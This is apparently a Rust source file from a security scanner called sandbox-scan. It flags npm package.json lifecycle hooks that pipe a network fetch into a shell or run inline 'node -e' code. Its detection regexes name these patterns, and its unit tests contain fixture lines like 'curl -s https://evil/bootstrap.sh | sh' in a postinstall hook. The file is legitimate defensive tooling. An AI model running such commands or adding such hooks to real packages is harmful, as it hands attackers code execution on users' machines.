sandbox-scan 0.1.0

Security scan pipeline (YARA + heuristics + compose + ClamAV) for the sandbox CLI.
Documentation 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153

//! `package.json` lifecycle script heuristics.
//!
//! npm/pnpm/yarn run any `preinstall`, `install`, `postinstall`, `prepare`,
//! `prepublish`, `prepublishOnly`, `postpublish`, etc. automatically. A
//! script that pipes the network into a shell (`curl … | sh`), evals an
//! environment variable, or invokes `node -e`/`node --eval` with inline JS
//! is the classic supply-chain backdoor shape (see eslint-config-prettier
//! 2025-07, ua-parser-js 2021-10, and many others).

use std::path::{Path, PathBuf};
use std::sync::OnceLock;

use regex::Regex;

use super::regex_util::compile;
use crate::findings::{Finding, Severity};

const RULE_ID_PIPE_TO_SHELL: &str = "heuristics/package_json_pipe_to_shell";
const RULE_ID_NODE_EVAL: &str = "heuristics/package_json_node_eval";

const HOOK_KEYS: &[&str] = &[
    "preinstall",
    "install",
    "postinstall",
    "prepare",
    "prepublish",
    "prepublishOnly",
    "postpublish",
    "preuninstall",
    "uninstall",
    "postuninstall",
];

fn pipe_to_shell() -> &'static Regex {
    static R: OnceLock<Regex> = OnceLock::new();
    R.get_or_init(|| compile(r"(?:curl|wget|fetch)\s+[^\n]*\|\s*(?:sh|bash|zsh|node)\b"))
}

fn node_eval() -> &'static Regex {
    static R: OnceLock<Regex> = OnceLock::new();
    R.get_or_init(|| compile(r"\bnode\s+(?:-e|--eval)\b"))
}

pub(super) fn check(rel: &Path, body: &str) -> Vec<Finding> {
    let mut out = Vec::new();

    // We don't parse JSON here — package.json bodies are simple enough that
    // a key→string pass with regex over each hook key catches what we want
    // and degrades gracefully when the JSON is malformed.
    for hook in HOOK_KEYS {
        let script = match extract_hook_value(body, hook) {
            Some(s) => s,
            None => continue,
        };
        if pipe_to_shell().is_match(&script) {
            out.push(Finding {
                rule_id: RULE_ID_PIPE_TO_SHELL.into(),
                severity: Severity::High,
                message: format!(
                    "package.json `scripts.{hook}` pipes a network fetch into a shell"
                ),
                path: PathBuf::from(rel),
                line: None,
                remediation: Some(
                    "Read what the upstream returns before letting it execute. If \
                     this is a legitimate post-install bootstrap, run it manually \
                     and pin the script. Otherwise the package is hostile."
                        .into(),
                ),
            });
        }
        if node_eval().is_match(&script) {
            out.push(Finding {
                rule_id: RULE_ID_NODE_EVAL.into(),
                severity: Severity::High,
                message: format!(
                    "package.json `scripts.{hook}` runs `node -e`/`--eval` with inline JS"
                ),
                path: PathBuf::from(rel),
                line: None,
                remediation: Some(
                    "Move the JS into a real file under version control so it's \
                     reviewable. Inline node eval in a lifecycle hook is a malware \
                     hallmark."
                        .into(),
                ),
            });
        }
    }
    out
}

/// Extract `scripts.<key>`'s string value. Lightweight regex parse — enough
/// for the lifecycle script bodies we care about. Returns the script body
/// without surrounding quotes.
fn extract_hook_value(body: &str, key: &str) -> Option<String> {
    let pattern = format!(r#""{}"\s*:\s*"((?:\\.|[^"\\])*)""#, regex::escape(key));
    let re = Regex::new(&pattern).ok()?;
    let m = re.captures(body)?;
    Some(m.get(1)?.as_str().to_string())
}

#[cfg(test)]
mod tests {
    use super::*;

    #[test]
    fn flags_curl_pipe_sh_in_postinstall() {
        let body = r#"{
            "name": "x",
            "scripts": {
                "postinstall": "curl -s https://evil/bootstrap.sh | sh"
            }
        }"#;
        let f = check(Path::new("package.json"), body);
        let ids: Vec<_> = f.iter().map(|i| i.rule_id.as_str()).collect();
        assert!(ids.contains(&RULE_ID_PIPE_TO_SHELL));
    }

    #[test]
    fn flags_node_eval_in_preinstall() {
        let body = r#"{
            "scripts": {
                "preinstall": "node -e \"require('http').get(...)\""
            }
        }"#;
        let f = check(Path::new("package.json"), body);
        assert!(f.iter().any(|i| i.rule_id == RULE_ID_NODE_EVAL));
    }

    #[test]
    fn clean_scripts_pass() {
        let body = r#"{
            "scripts": {
                "test": "vitest",
                "build": "tsc -p .",
                "postinstall": "echo welcome"
            }
        }"#;
        assert!(check(Path::new("package.json"), body).is_empty());
    }

    #[test]
    fn ignores_non_hook_scripts() {
        let body = r#"{
            "scripts": {
                "deploy": "curl https://x | sh"
            }
        }"#;
        // `deploy` is not a lifecycle hook → user-invoked, not auto-run.
        assert!(check(Path::new("package.json"), body).is_empty());
    }
}